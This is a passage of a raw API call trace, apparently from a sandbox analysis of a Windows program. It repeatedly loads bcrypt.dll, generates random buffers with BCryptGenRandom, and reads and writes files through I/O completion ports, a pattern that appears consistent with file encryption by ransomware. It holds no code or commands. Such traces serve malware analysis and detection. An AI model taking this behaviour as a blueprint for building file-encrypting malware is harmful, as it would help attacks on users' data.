[0165.481] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.481] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.482] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.482] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.493] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1e58, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.494] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.507] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x19a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.508] CloseHandle (hObject=0x2a4) returned 1 [0165.508] free (_Block=0x3df0008) [0165.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.518] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.518] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.518] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.518] free (_Block=0x3e305b8) [0165.518] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.518] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.518] free (_Block=0x1fa91d0) [0165.519] free (_Block=0x1fa2ed8) [0165.519] free (_Block=0x1fa90b8) [0165.519] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.520] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.540] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a6c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.541] CloseHandle (hObject=0x2a4) returned 1 [0165.541] free (_Block=0x3df0008) [0165.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.551] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.551] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.551] free (_Block=0x3e305b8) [0165.551] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.551] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.551] free (_Block=0x1fa91d0) [0165.551] free (_Block=0x1fa2ed8) [0165.551] free (_Block=0x1fa90b8) [0165.551] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.553] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.598] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6140, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0166.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.265] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x411a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.266] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.277] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3d5c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.303] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4040, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.307] CloseHandle (hObject=0x2a4) returned 1 [0166.307] free (_Block=0x3df0008) [0166.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0166.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0166.315] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.315] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.315] free (_Block=0x3e305b8) [0166.315] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.315] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.316] free (_Block=0x1fa91d0) [0166.316] free (_Block=0x1fa2ed8) [0166.316] free (_Block=0x1fa90b8) [0166.316] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.317] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x4d20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0166.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.327] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x47ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.328] CloseHandle (hObject=0x2a4) returned 1 [0166.328] free (_Block=0x3df0008) [0166.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.336] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0166.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0166.337] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.337] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.337] free (_Block=0x3e305b8) [0166.337] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.337] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.338] free (_Block=0x1fa91d0) [0166.338] free (_Block=0x1fa2ed8) [0166.338] free (_Block=0x1fa90b8) [0166.338] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.427] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0166.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0166.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0166.456] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.456] free (_Block=0x3e305b8) [0166.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.456] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.457] free (_Block=0x1fa91d0) [0166.457] free (_Block=0x1fa2ed8) [0166.457] free (_Block=0x1fa90b8) [0166.457] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.472] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0166.473] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0166.473] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.473] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.473] free (_Block=0x3e305b8) [0166.473] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.473] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.474] free (_Block=0x1fa91d0) [0166.474] free (_Block=0x1fa2ed8) [0166.474] free (_Block=0x1fa90b8) [0166.474] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.475] CloseHandle (hObject=0x2a4) returned 1 [0166.475] free (_Block=0x3df0008) [0166.475] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0166.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0166.515] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.515] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.516] free (_Block=0x3e305b8) [0166.516] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.516] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.516] free (_Block=0x1fa91d0) [0166.516] free (_Block=0x1fa2ed8) [0166.516] free (_Block=0x1fa90b8) [0166.516] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0166.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.525] CloseHandle (hObject=0x2a8) returned 1 [0166.525] free (_Block=0x1ff1e60) [0166.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.535] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x140c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.559] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x26b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0166.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.568] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.576] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0166.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.582] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4cea, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0166.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.614] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.614] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0166.614] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0166.615] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.615] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.615] free (_Block=0x3e305b8) [0166.615] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.615] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.616] free (_Block=0x1fa91d0) [0166.616] free (_Block=0x1fa2ed8) [0166.616] free (_Block=0x1fa90b8) [0166.616] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0166.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.617] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xb130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0166.618] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x6030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, 